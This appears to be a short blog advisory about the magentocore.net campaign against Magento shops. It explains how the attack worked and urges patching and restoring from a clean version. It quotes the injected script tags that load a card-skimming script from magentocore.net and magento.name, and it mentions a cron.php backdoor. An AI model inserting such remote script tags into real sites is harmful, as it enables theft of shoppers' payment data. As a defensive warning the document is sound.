Be aware of magentocore.net malware
Last month an infection of thousands of Magento shops was reported due to a maleware from a website called magentocore.net. This is all you need to know about and why it is not safe to install things without a good review.
Be aware of magentocore.net malware
The following code was added into header or footer field in your Magento backend:
1 | <script type="text/javascript" src="https://magentocore.net/mage/mage.js"></script> |
after first wave of attacks and a ban from google on magentocore.net domain hackers changed it to magento.name
1 | <script type="text/javascript" src="https://magento.name/mage/mage.js"></script> |
These scripts look not harmful on first sight, because of Magento in domain name. This lonely line of code loads and executes JavaScript code on your clients browsers and send credit card data.
How is this hack possible?
The main problem are unpatched shops. As show more than one time, you need to install each patch as soon as possible. Patching is the only way to stay secure. A Magento shop is not only a work while adding some modules and themes – you are responsible to keep this software up to date! Current patches fixed some remote execution and user rights problems. If they are not installed it is quite easy to take control of a shop. A hacker won’t break it – he will modify it to steal data.
My shop was hacked…and now?
This specific malware is a devil one. Obviously it only added a line of JavaScript insert code. The problem: if you remove it, it may be there after some time again. How is that possible? The magentocore.net malware changes your cron.php and adds a backdoor. Your shop is not save anymore. Go back to last valid version of your repository.
Conclusion
magentocore.net hack is a interesting example how to get hacked. Adding a *.js file from a remote source is quite easy and with a Magento domain its nearly impossible to identify while watching many different js files loading from remote. It is dangerous not to patch shops. Often you don’t even recognize you were hacked. Google saves many shops by banning dangerous domains, but hackers can easily register another one and change script path on already infected systems. Watch out and take a good look on all remote Code you insert. A domain check is not enough – you need to control actual JavaScript code.